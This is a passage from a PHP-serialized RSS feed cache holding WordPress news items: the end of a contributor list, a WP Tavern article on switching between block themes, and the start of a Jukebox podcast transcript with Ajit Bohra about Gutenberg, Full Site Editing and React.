<a href=\"https://profiles.wordpress.org/mkaz/\">Marcus Kazmierczak</a>, <a href=\"https://profiles.wordpress.org/mark-k/\">Mark-k</a>, <a href=\"https://profiles.wordpress.org/mhuntdesign/\">Matt</a>, <a href=\"https://profiles.wordpress.org/mdawaffe/\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/mikeschroder/\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/moch11/\">moch11</a>, <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/ntsekouras/\">Nik Tsekouras</a>, <a href=\"https://profiles.wordpress.org/paaljoachim/\">Paal Joachim Romdahl</a>, <a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a>, <a href=\"https://profiles.wordpress.org/pbearne/\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pbiron/\">Paul Biron</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/walbo/\">Petter Walbø Johnsgård</a>, <a href=\"https://profiles.wordpress.org/radixweb/\">Radixweb</a>, <a href=\"https://profiles.wordpress.org/rtm909/\">Rahul Mehta</a>, <a href=\"https://profiles.wordpress.org/ramonopoly/\">ramonopoly</a>, <a href=\"https://profiles.wordpress.org/ravipatel/\">ravipatel</a>, <a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella</a>, <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a>, <a href=\"https://profiles.wordpress.org/kreppar/\">Rodrigo Arias</a>, <a href=\"https://profiles.wordpress.org/sanketchodavadiya/\">Sanket Chodavadiya</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/sabernhardt/\">Stephen Bernhardt</a>, <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stevehenty/\">Steve Henty</a>, <a href=\"https://profiles.wordpress.org/terraling/\">terraling</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/tmatsuur/\">tmatsuur</a>, <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/hellofromTonya/\">Tonya Mork</a>, <a href=\"https://profiles.wordpress.org/toro_unit/\">Toro_Unit (Hiroshi Urabe)</a>, <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad T</a>, <a href=\"https://profiles.wordpress.org/wb1234/\">wb1234</a>, and <a href=\"https://profiles.wordpress.org/wfmattr/\">WFMattR</a>.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 09 Sep 2021 03:11:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Jonathan Desrosiers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: FSE Program: Insights Into Switching Between Block Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122476\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:177:\"https://wptavern.com/fse-program-insights-into-switching-between-block-themes?utm_source=rss&utm_medium=rss&utm_campaign=fse-program-insights-into-switching-between-block-themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7296:\"<p class=\"has-drop-cap\">Unlike routine testing rounds for the FSE Outreach Program, Anne McCarthy threw a bit of a twist on the Make WordPress Test blog earlier today. The announcement asks users to think about what they would like to see when switching between block themes. The <a href=\"https://make.wordpress.org/test/2021/09/08/fse-program-exploration-help-with-the-future-of-block-theme-switching/\">test is open to anyone</a> who wants to participate through September 29.</p>\n\n\n\n<p>The steps are loose and not required. The goal is to get people thinking and discussing what the theme-switching flow will look like over time. McCarthy asked several questions, but they are merely a starting point for a more open-ended discussion.</p>\n\n\n\n<p>While I sometimes need structure, I tend to break the rules anyway. The format of this test suited me well today.</p>\n\n\n\n<p>I am not one for switching themes. Since I learned how to design for WordPress well over a decade ago, I have never moved from one theme to the next. At least not in the same way that the average user would. Instead, every time I have added a new coat of paint on my websites, I have simply switched over the foundation to whatever I had been working on at the given moment. WordPress themes, for me, were always just an iteration upon the last project.</p>\n\n\n\n<p>One of the cornerstones of programming is to reuse your code, and it is a principle that I have taken to heart. Even now, as I continue to explore block theme design, I am doing so from a gutted version of the last WordPress theme I built.</p>\n\n\n\n<p>When I think about switching themes, it is not an experience that I am accustomed to. Even when I started working for WP Tavern, the site already used one of my themes with some customizations. It feels like I have missed out. Throughout my entire journey with WordPress since version 1.5, in which the platform first introduced themes, I have never truly experienced the theme-switching process in the most fundamental way. <em>I will soon, but we will talk about that on another day.</em></p>\n\n\n\n<p>When I have &ldquo;switched&rdquo; themes, I have done so in test environments for writing about them or running tech support for end-users.</p>\n\n\n\n<p>The call for exploration mainly focused on global design-related features. However, in my experience, these tend to matter far less than what a user&rsquo;s content will look like. The first thing I do when testing any theme is to load a demo post. Lately, this has been the &ldquo;Welcome to the Gutenberg Editor&rdquo; test post. The primary question: <em>Can I read the content comfortably?</em> If I do not get past this stage, I simply deactivate the theme.</p>\n\n\n\n<p>For this experiment, I chose three themes:</p>\n\n\n\n<ul><li>My custom, unreleased project</li><li><a href=\"https://wordpress.org/themes/tt1-blocks/\">TT1 Blocks</a></li><li><a href=\"https://wordpress.org/themes/quadrat/\">Quadrat</a></li></ul>\n\n\n\n<p>I started with that foundation of testing how easy it was to read a simple blog post.</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>\n\n\n\n<p>Overall, each theme performed admirably. However, Quadrat&rsquo;s use of the featured image on a single post view felt out of place.</p>\n\n\n\n<p>One question that keeps me up at night is how cross-theme compatibility will work on the content level. Default block output should translate from one theme to the next with little or no issues. However, custom block styles, font sizes, colors, and the full range of presets are already a problem area.</p>\n\n\n\n<p>This is not a new conversation. There is an <a href=\"https://github.com/WordPress/gutenberg/issues/29568\">ongoing discussion</a> on standardizing some features. But the <em>cat is already out of the bag</em> and running loose through the house.</p>\n\n\n\n<p>Global styles and templates are features that themers have been dealing with for years in some form or another. The new systems are just different ways of doing the same thing.</p>\n\n\n\n<p>However, when design elements merge with content, switching themes becomes more complex without an underlying, standardized system. To illustrate this point, I checked all three of my test themes against a post that used custom block styles, gradient colors, and font sizes. I wanted to push the boundaries beyond a simple blog post.</p>\n\n\n\n<p>The content was built with my custom theme and an &ldquo;open canvas&rdquo; template. Quadrat had a similar template for hiding the post title, but TT1 Blocks did not.</p>\n\n\n\n<p>The result was, <em>ahem</em>, rough:</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>\n\n\n\n<p>Of course, my custom theme looks as it should. This is not to say that TT1 Blocks and Quadrat are poorly designed. They are actually two of the best block themes available at the moment. The problem is that they do not share the same block styles and presets. WordPress and Gutenberg are also missing some fundamental layout tools that could make it easier to carry this design from one theme to the next.</p>\n\n\n\n<p>The most complex piece of the design is with the opening Cover block pattern:</p>\n\n\n\n<img />\n\n\n\n<p>Technically, this is a Cover block within another. The bottom layer has a background image with a duotone filter and sets the inner content to 90% width of its parent. The second layer has a theme-defined gradient background and sets its inside container to the left at 50% width. Plus, it has a sprinkling of custom font sizes.</p>\n\n\n\n<p>These layout controls are only possible through custom block styles or some hacky uses of the Columns block. I chose the former because it was easier, but it also means they are broken when used with any other theme.</p>\n\n\n\n<p>While I called this the most complex piece of the design, it is actually a simple thing to do with most page builders or with a few lines of CSS. Until WordPress has some type of grid container block, theme authors will rely on custom techniques to make such layouts possible. It can and will get even uglier than this the longer we wait.</p>\n\n\n\n<p>The open discussions on standardizing presets like <a href=\"https://richtabor.com/standardizing-theme-json-font-sizes/\">font sizes</a> and <a href=\"https://richtabor.com/standardizing-theme-json-colors/\">color names</a> may bear fruit that could help with the more trivial parts. However, I have not seen gradient names pop up in this discussion.</p>\n\n\n\n<p>I do have at least one ulterior motive for this test. I have long wanted to try more experimental post designs and layouts here at WP Tavern. However, I know that we will eventually switch themes. That voice in the back of my mind always reminds me that those custom-designed post layouts will likely break when that day comes. The tools are not advanced enough for me to take the plunge. Not yet anyway.</p>\n\n\n\n<p>At this point, I am sure that I am no longer following the intended direction of the call for exploration. However, I am just letting the journey take me where I am meant to go. My destination is an addition to my wish list: more robust layout tools that work from theme to theme.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 09 Sep 2021 02:35:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"WPTavern: #7 – Ajit Bohra on Gutenberg, Full Site Editing and React\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=122369\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:179:\"https://wptavern.com/podcast/7-ajit-bohra-on-gutenberg-full-site-editing-and-react?utm_source=rss&utm_medium=rss&utm_campaign=7-ajit-bohra-on-gutenberg-full-site-editing-and-react\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:65378:\"<h2>About this episode.</h2>\n\n\n\n<p>On the podcast today we have <a href=\"https://twitter.com/ajitbohra\">Ajit Bohra</a>.</p>\n\n\n\n<p>Ajit is a keen advocate of WordPress, having used it and committed to it, for many years. He&rsquo;s a full stack developer working at <a href=\"https://lubus.in/\">Lubus</a> which is based in Mumbai, India. His team works with WordPress as well as offering solutions built with Laravel and React.</p>\n\n\n\n<p>He&rsquo;s on the podcast today to offer up his opinions about the near future in WordPress and why he&rsquo;s confident that the project is moving in the right direction.</p>\n\n\n\n<p>To make matters easier to digest we break up the podcast into three distinct sections.</p>\n\n\n\n<p>Starting off with Gutenberg we discuss where the Block Editor is at right now and what Ajit sees as the benefits of a Block based approach to content building. We go into some concrete examples of why Ajit thinks that the Block Editor is preferable to the Classic editor as well as discussing some of the projects that he&rsquo;s been working on to enhance the editing experience for his team and the community. We also talk about the pace of development and whether or not it&rsquo;s keeping up with the expectations of WordPress users.</p>\n\n\n\n<p>We then move onto a detailed conversation about Full Site Editing which is going to play a pivotal role in WordPress&rsquo; utility going forwards. The power that it will offer non-technical users to build out their entire site is an exciting prospect, but right now it&rsquo;s still a work in progress. Ajit talks about why Full Site Editing is needed to compete in the CMS market as well as how Block Patterns will make site building much easier in the future.</p>\n\n\n\n<p>Finally we get into the subject of WordPress&rsquo; need to move towards a future in which React is playing a vital part in the software&rsquo;s Core. Why does Ajit think that the project needed to move away from a PHP based platform; after all, it was easy to work with and people had become very familiar with how to build sites using their PHP skills. It&rsquo;s a case of having to keep up, and as Ajit says, he thinks that you have to unlearn to learn. We briefly discuss the resources which Ajit used to up-skill, websites that he frequents and courses which he recommends should you wish to take the plunge.</p>\n\n\n\n<p>In parts the audio is a little choppy, in fact this is a second pass at recording this episode, but I felt that the message contained within was well worth publishing despite that, and I hope that you do too.</p>\n\n\n\n<h2>Useful links.</h2>\n\n\n\n<p><a href=\"https://twitter.com/ajitbohra\">Ajit&rsquo;s Twitter account</a></p>\n\n\n\n<p><a href=\"https://lubus.in/\">Lubus</a></p>\n\n\n\n<p><a href=\"https://blablablocks.com/\">BlaBlaBlocks</a></p>\n\n\n\n<p><a href=\"https://beginnerjavascript.com/\">Beginner Javascript</a></p>\n\n\n\n<p><a href=\"https://es6.io/\">ES6</a></p>\n\n\n\n<p><a href=\"https://javascript30.com/\">Javascript 30</a></p>\n\n\n\n<p><a href=\"https://reactforbeginners.com/\">React for Beginners</a></p>\n\n\n\n<p><a href=\"https://www.youtube.com/c/TheNetNinja\">The Net Ninja YouTube channel</a></p>\n\n\n\n<p><a href=\"https://egghead.io/courses/the-beginner-s-guide-to-react\">The Beginner&rsquo;s Guide to React</a></p>\n\n\n\n<p><a href=\"https://epicreact.dev/\">Epic React</a></p>\n\n\n\n<p><a href=\"https://wptavern.com/is-wordpress-development-really-all-that-hard-to-get-into-today\">Is WordPress Development Really All That Hard To Get Into Today?</a></p>\n\n\nTranscript<div><div class=\"chat-transcript\"><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:00:00]</div> <div class=\"chat-text\"><p>Welcome to the seventh edition of the Jukebox podcast from WP Tavern. My name is Nathan Wrigley. Jukebox is a podcast all about WordPress, the software, the events, and the community. Every month, we&rsquo;re bringing you someone from that community to discuss a topic of current interest. If you like the podcast, please share it with your friends. You might also like to think about subscribing so that you can get all the episodes in your podcast player automatically. And you can do that by searching for WP Tavern in your podcast player, or by going to WP Tavern dot com forward slash feed forward slash podcast. You can also play the podcast episodes on the WP Tavern website, if you prefer doing it that way. If you have any thoughts about the podcast, perhaps the suggestion of a guest or an interesting subject, then head over to WP Tavern dot com forward slash contact forward slash jukebox. Use the contact form there and we&rsquo;d certainly welcome your input.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>Okay, so on the podcast today, we have Ajit Bohra. Adit is a keen advocate of WordPress having used it, and committed to it, for many years. He&rsquo;s a full stack developer working at Lubus, which is based in Mumbai, India. His team works with WordPress as well as offering solutions built with Laravel and React. He&rsquo;s on the podcast today to offer up his opinions about the near future in WordPress and why he&rsquo;s confident that the project is moving in the right direction.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>To make matters easier we break the podcast up into three distinct sections starting off with Gutenberg, we discuss where the block editor is at right now and what Ajit sees as the benefits of a block based approach to content building. We go into some concrete examples of why Ajit thinks that the block editor is preferable to the classic editor, as well as discussing some of the projects that he&rsquo;s been working on to enhance the editing experience for his team and the community.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>We also talk about the pace of development and whether or not it&rsquo;s keeping up with the expectations of WordPress users. We then move on to a detailed conversation about full site editing, which is going to play a pivotal role in WordPress&rsquo; utility, going forwards. The power that it will often non-technical users to build out their entire site is an exciting prospect, but right now it&rsquo;s still a work in progress. Ajit talks about why full site editing is needed to compete in the CMS market, as well as how block patterns will make site building much easier in the future.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>Finally, we get into the subject of WordPress&rsquo; need to move towards a future in which React is playing a vital part in the software&rsquo;s core. Why does Ajit think that the project needed to move away from a PHP based platform? After all, it was easy to work with and people have become very familiar with how to build sites using their PHP skills. It&rsquo;s a case of having to keep up, and as Ajit says, he thinks that you have to unlearn to learn.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>We briefly discuss the resources, which Ajit used to up-skill. Websites that he frequents and courses, which he recommends should you wish to take the plunge?</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>In parts, the audio is a little choppy. In fact, this is a second pass at recording this episode, but I felt that the message contained within it, it was well worth publishing despite that, and I hope that you do too.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>If any of those, the points raised in this podcast resonate with you, be sure to head over and find the post at WP Tavern dot com forward slash podcast, and leave us a comment there.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>And so without further delay, I bring you Ajit Bohra.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>I am joined today by Ajit Bohra. Hello, Ajit, welcome to the podcast.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:04:37]</div> <div class=\"chat-text\"><p>Yeah, hi Nathan.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:04:38]</div> <div class=\"chat-text\"><p>It&rsquo;s very nice to have you on, as we typically do at the beginning of the podcast, we&rsquo;d like to allow our guests to introduce themselves and tell us a little bit about their journey and how they came to be involved in WordPress. So, it doesn&rsquo;t matter how far you want to rewind your life, but if you could paint a little picture of how it is that you&rsquo;re on the podcast today. When did you start using WordPress? What is it that you&rsquo;re doing currently?&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:05:00]</div> <div class=\"chat-text\"><p>Yeah, so I am from Mumbai, India and on a professional front, I own an agency where we provide WordPress based solution to the clients. It has been quite an interesting journey for me because I have been someone who always hated computers and programming.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>And it&rsquo;s exciting that today it&rsquo;s my passion for everything. I started working with WordPress when it was around version one x. We had that blue, white screen where we didn&rsquo;t have the sidebars at an early stage of WordPress. It&rsquo;s been around 10 to 12 years of experience working with WordPress. I&rsquo;ve worked with a lot of technologies being Drupal, being Joomla, being DotNet.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>And then eventually I fall in love with PHP. Probably I got into PHP because of WordPress. So I can say WordPress was the entry point for me to get into the PHP world. There was a time when I was just working with WordPress, I was not a community guy or something. Then I was hearing a lot about the meetups, WordCamps and everything, and then happened to be part of the local WordPress community.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>And then started visiting the WordCamps and I think, and I was like, damn, I have been missing out on a lot of interesting stuff. Like this is something I have missed out. And then for three, four years, there was a lot of travelling around the country, visiting international WordCamps trying to speak at a couple of WordCamps and local meetups. It was quite an interesting journey. And then at one point, after visiting this WordCamp, I was like, damn, I&rsquo;m not even contributing to the WordPress, and it&rsquo;d been 10, 12 years. I&rsquo;ve been in the industry and I&rsquo;m being like a leech where I&rsquo;m just taking things from WordPress. That was the point I was looking to contribute to WordPress. I was like, okay, now I want to learn something new, because there was a shift in WordPress. So Gutenberg become an entry point for me to learn new things and also contribute to the, contribute back to the WordPress community. So I started with one refactoring PR and from that things accelerated and start contributing more PR&rsquo;s to looking at different aspects of development, helping people get into the Gutenberg bandwagon. And then I started writing the notes for the weekly editor meeting. So quite interesting thing happens. And then finally I&rsquo;m into the WordPress community.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:07:00]</div> <div class=\"chat-text\"><p>Thank you. That&rsquo;s really interesting. So you go back really a long way. Community is obviously a part of this discussion, but we&rsquo;re really going to focus on everything post Gutenberg.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>When we started communicating about this podcast episode, we decided on three different sections and that&rsquo;s how the episode is going to be chunked today. We&rsquo;re going to talk initially, just about Gutenberg and have a conversation around what we think of it and where it is and how the community has been involved with that and so on. And we&rsquo;re going to move on to a discussion of full site editing, and what we think about the state of play there. And then finally talking about the future of the way that WordPress will be built from the coding side. We&rsquo;ll talk about React and how that&rsquo;s impacting things. So we&rsquo;ll kick off the conversation with Gutenberg.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>Now, obviously you just mentioned that you got yourself involved in the community side of things around Gutenberg, and I&rsquo;m curious because it does seem to be quite a divisive issue. On the one hand, we&rsquo;ve got people who really enjoy using it and love it and find great pleasure in experiencing it. And then you&rsquo;ve got other people who are finding it to be a difficult transition. They wish that perhaps that it hadn&rsquo;t come along and things had continued with the old TinyMCE implementation. What is it about Gutenberg that you enjoy so much? Why do you feel that it&rsquo;s a good thing that the community has done pushing Gutenberg into core in WordPress five.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:08:22]</div> <div class=\"chat-text\"><p>Before I say I enjoyed Gutenberg, I have to admit that I was the guy who hated Gutenberg. When it was introduced, I put it that, right now I have to learn everything new and this is going to be difficult. So I have a love, hate relationship with Gutenberg. Eventually came to a point where I was like, oh damn, I&rsquo;m enjoying it.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>I can connect with a lot of people because I have never been a Javascript guy. I knew React, I knew other stuff around it, but I was more comfortable with PHP and I can see a lot of people are comfortable with PHP for them. So there is a resistance saying that, okay, now we have to learn new stuff. And also problem is it changes a lot of things. How we have been approaching things. You have to change the mindset. You have to have that bloggers mentality. So that&rsquo;s the reason why people have a resistance because you have to unlearn, to learn new things and people are not ready to unlearn. That&rsquo;s the biggest problem. When they look at Gutenberg, they are still with that process of PHP base with a system where you have this hierarchy of files and everything. Which has changed.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>So Core is trying to provide a backward compatibility and also making things smoother for people. At the one end where developers are trying to move, push the envelope. There are people, they are still holding their old envelope and saying we want things this way. So that resistance is creating the problem, but when you take a step back and look at things, things look a lot more, good. If you look at it from a positive side, you end up learning something new. Like if it was not Gutenberg, WordPress community will have not ventured into JavaScript and React. That&rsquo;s opening door for you. If you think from a developer perspective, it is adding a lot more feathers in your cap.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>Okay. Previously, we are working with the PHP. Now you&rsquo;re working with JavaScript. Now you&rsquo;re working with React. Now you can create desktop apps because React and JavaScript helps you create desktop app, mobile app also. So Gutenberg just becomes a reason for you to enter into different dimension and a different nuance.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>And that&rsquo;s the reason why I love it because Gutenberg gave me that push to go an extra mile, which is a technically helping me on my personal professional front also. And if I look from a WordPress perspective, like previously, we were doing certain things and we were quite convenient and comfortable with all this stuff, but at a certain time, and I used to wish, if we can do this thing a different way, because let&rsquo;s accept it now, even if whatever we were doing with PHP was comfortable, easy for us because we have been doing that for 10 years.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>And after 10 years to tell someone, you have to do it that way, you are going to have resistance. But there are a lot of problems that we had since last 10 years, there was a lot of fragmentation of implementations. You have this custom meta boxes, a lot of other stuff, you just want your content and it look good, and user-friendly, you want to give your end users a UI UX in a way where they can control their content. And we ended up creating&hellip; it&rsquo;s a lot mess, because somewhere someone using XYZ page builder, some are creating their own page builders. Technically everybody wants &lsquo;what you see is what you get&rsquo; real editor because everybody&rsquo;s struggling.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>So down the line, we are admitting that whatever editor right now we have is problematic because we are trying to stuff in ten different plugins to make it work in a different way. Not do any extra work on your content editor to have that kind of experience. That means there is a problem with the implementation that we have in Core, and I guess Gutenberg just takes care of those problems. If you look at one problem is shortcodes. Like we have shortcode we have widgets, there are ten to twenty different implementation that you can have on your content editor, but when the block editor steps in, that is one implementation that rules out everything, you no longer have those clumsy shortcodes.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>Even if you look at the shortcodes, people have these shortcode builders, and that is where block editors coming in with features, where you no longer have to do all those teams because you have a UI, you can configure that your end user can use. So from an user perspective, it is a very good product. Like I&rsquo;ve been working with a lot of publications and brands. They love Gutenberg. They have been transitioning their old system, to the new system because their marketing team, their content team enjoys it. Even the small to mid-level clients, when they see Gutenberg, they are like, why we didn&rsquo;t have this previously.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>You look at the WordPress user base. We have different kinds of people we can categorize. One are the people who are very hardcore developers. And then there is a second category. I call them the people who do tinkering. They are not hardcore developer, but they happen to get into development accidentally by tinkering with WordPress. And then we have the third category of implementation. So if you ask me the people who do implementation jobs, their job is to take team, take a couple of plugins and make everything. They are the happiest person on the earth when it comes to Gutenberg. But if you talk about people who do a lot of tinkering, they find it very difficult because they have not been a hardcore developer. They have learned PHP the hard way. They have invested a lot of time figuring out tinkering and they are kind of a semi developer. So they find it very difficult for them venturing into JavaScript. It&rsquo;s like, oh, damn, this is a different game. But if you look at hardcore developers, they know PHP and everything. And if you look at the ratio, we have a lot more people who are doing implementation jobs on WordPress based website. We have way more people who are a semi developer, they are not hardcore developer, but they tend to make things work for WordPress. And if you look at hardcore developer, that ratio is very low. And the resistance that you see from the people is from these other two categories.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:13:30]</div> <div class=\"chat-text\"><p>I&rsquo;m just wondering, just maybe to illustrate your excitement about it. If you can bring to our attention, some example, perhaps of a block, something in use inside Gutenberg that you feel encapsulates why it&rsquo;s so good. It could even be something that you&rsquo;ve built yourself or a third party thing. Just something that you think&hellip; this represents a really great to use of what Gutenberg is capable of.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:13:54]</div> <div class=\"chat-text\"><p>So I will do that in two. Part one is if you look at previously how the Classic Editor works, we had all the content on one page, and I always hated when I have to move content. If I have four paragraphs, if I want to move the last paragraph to the top, the only thing that I have was copy and paste. But with the blocks, I can just move around the content. And that&rsquo;s the beauty that I love about blocks. And second is, there are a lot of shortcodes and everything. That&rsquo;s gone. That&rsquo;s the Core thing. And if you look at building things, the only option that you have is, custom post types. If you want to segregate content and create different types of content, the separation is only at the level of content, but what if you want to give your content and pull together different templating and everything? That is not possible with the classic one, because you have to do a lot of meta boxes in them.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>So I remember working on a couple of projects lately, where we have this campaign building tool where a theme needs a lot of banners on their website. So . Just by creating a custom post type and utilizing the power of Gutenberg, you are giving a marketing team, a tool where they can create their own banners. Like it can be a mashup of a cover block with headings, with image and buttons and boom, they have their own banner tool. Like you don&rsquo;t have to do lot of extra stuff. All the building blocks are there. You have to just assemble them, give it to your users. They can just generate all the banners on the fly. So that&rsquo;s the beauty.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:15:14]</div> <div class=\"chat-text\"><p>Yeah. The ability to have everything inside the one UI, all of the settings for all of the different bits and pieces that you may be building your page with as opposed to having to go and tinker with settings in a different part of WordPress is quite compelling. It makes things significantly 